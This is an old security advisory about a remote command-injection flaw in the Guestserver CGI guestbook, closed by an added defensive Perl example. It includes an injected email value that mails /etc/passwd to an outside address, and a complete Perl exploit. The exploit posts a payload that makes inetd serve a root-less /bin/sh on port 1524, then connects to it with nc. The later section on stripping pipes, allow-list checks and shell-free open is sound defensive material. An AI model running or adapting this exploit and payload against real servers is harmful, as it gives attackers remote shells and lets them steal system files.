======[ sinsecurity.net ]======

====[ Information ]======
Program Name   : Guestbook
Program Author : http://www.guestserver.com
Test Versions  : 4.12, 4.09 (others believed to be vulnerable)
=========================

Overview
========
Guestbook is just your regular old cgi guestbook, that's about it.

Problem Description
===================
By default the guestbook is not vulnerable. The guestbook becomes vulnerable when someone sets the option <-guestbook.mailto_guest-> to 1 in guestbook.config. When enabled, this sends an email to the person after they have signed the guestbook. Enabling this option makes the guestbook vulnerable to remote command execution because of this line:

    open (MAIL, "|$mailprogram $FORM{'email'}");

While the author does filter out things like ; < > : he forgets about the pesky |. This is definitely not good. Now you could make your email something like this:

    |cat /etc/passwd | mail imbad@ohno.com

and it would send you the passwd :) You are somewhat limited in what you can do with the commands because he filters < > : .

Solution
========
Easiest way to fix this problem is to just strip all those | and you should be good.

    $email =~ s/\|//g;

Add that and everything will be just dandy.

======[ enz00@sinsecurity.net ]======

Below is a little exploit I wrote for this vulnerability. It basically first echoes "ingreslock stream tcp nowait nobody /bin/sh sh -i" into /tmp/p00n, then it does /usr/sbin/inetd /tmp/p00n, thus giving you a remote shell as user nobody on port 1524.
==========================================================================================================
#!/usr/bin/perl
# |Guestbook by Guestserver|
# |http://www.guestserver.com|
# |enz00@sinsecurity.net|
# |http://www.sinsecurity.net|

use Socket;

if(!$ARGV[1]) {
    print "-Guestbook by Guestserver sploit- enz00\@sinsecurity.net\n";
    print "Usage: \n";
    exit;
}

print "-Guestbook by Guestserver sploit- enz00\@sinsecurity.net\n";

$host   = $ARGV[0];
$script = $ARGV[1];

# The POST that signs the guestbook; the email field carries the piped
# commands described above, URL-encoded.
$command = "POST $script HTTP/1.0
Connection: close
User-Agent: Mozilla/4.72 [en] (X11; I; Linux 2.2.12-20 i686)
Host: $host
Accept-Charset: iso-8859-1,*,utf-8
Content-type: application/x-www-form-urlencoded
Content-length: 199

name=b0b&SIGN=Sign+it%21&email=b%40b.b%7Cecho+ingreslock+stream+tcp+nowait+nobody+%2Fbin%2Fsh+sh+-i%7Ctee+%2Ftmp%2Fp00n%7C%2Fusr%2Fsbin%2Finetd+%2Ftmp%2Fp00n&homepage=&location=Croatia&message=%3A%29";

# Connect to the web server on port 80 and send the request.
$serverIP   = inet_aton($host);
$serverAddr = sockaddr_in(80, $serverIP);
socket(HOST, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if(connect(HOST, $serverAddr)) {
    print HOST "$command";
    close HOST;
}

# inetd started with /tmp/p00n listens on the ingreslock port (1524).
print "\nTrying to get your shell.....\n\n";
sleep(5);
system("nc $host 1524");
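The fix from the Solution section, placed beside a stricter allow-list check and a shell-free way of starting the mailer, as an added Perl example that is not part of the original advisory or of the Guestserver code. It assumes a hypothetical %FORM hash and $mailprogram value standing in for what guestbook.cgi reads from the form and from guestbook.config; the sample address is constructed from the advisory's own payload.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Constructed stand-in for the form data guestbook.cgi receives; the address
# reuses the advisory's payload so the three approaches can be compared.
my %FORM = ( email => 'b@b.b|cat /etc/passwd | mail imbad@ohno.com' );
my $mailprogram = '/usr/lib/sendmail';   # assumption: the path guestbook.config names

# 1. The advisory's fix: remove every '|' before the address reaches the shell.
sub strip_pipes {
    my ($email) = @_;
    $email =~ s/\|//g;
    return $email;
}

# 2. Allow-list check: accept only characters an address legitimately contains,
#    instead of enumerating bad ones (; < > : |) one at a time.
sub is_plain_email {
    my ($email) = @_;
    return ($email =~ /^[A-Za-z0-9._%+-]+\@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$/) ? 1 : 0;
}

# 3. Start the mailer without a shell: the list form of open execs the program
#    directly, so no metacharacter in $email is ever interpreted by /bin/sh.
sub open_mailer {
    my ($email) = @_;
    die "refusing to mail to '$email'\n" unless is_plain_email($email);
    open(my $mail, '|-', $mailprogram, $email)
        or die "cannot run $mailprogram: $!\n";
    return $mail;   # the caller prints the message to this handle, then closes it
}

print "after strip_pipes: ", strip_pipes($FORM{'email'}), "\n";
print "is_plain_email (payload): ", is_plain_email($FORM{'email'}), "\n";
print "is_plain_email (b\@b.b):  ", is_plain_email('b@b.b'), "\n";
```

Stripping the pipe from the sample address still leaves `b@b.bcat /etc/passwd  mail imbad@ohno.com`, which the shell splits into extra arguments for the mailer; the allow-list check rejects it outright, and the list-form open keeps the shell out of the path entirely.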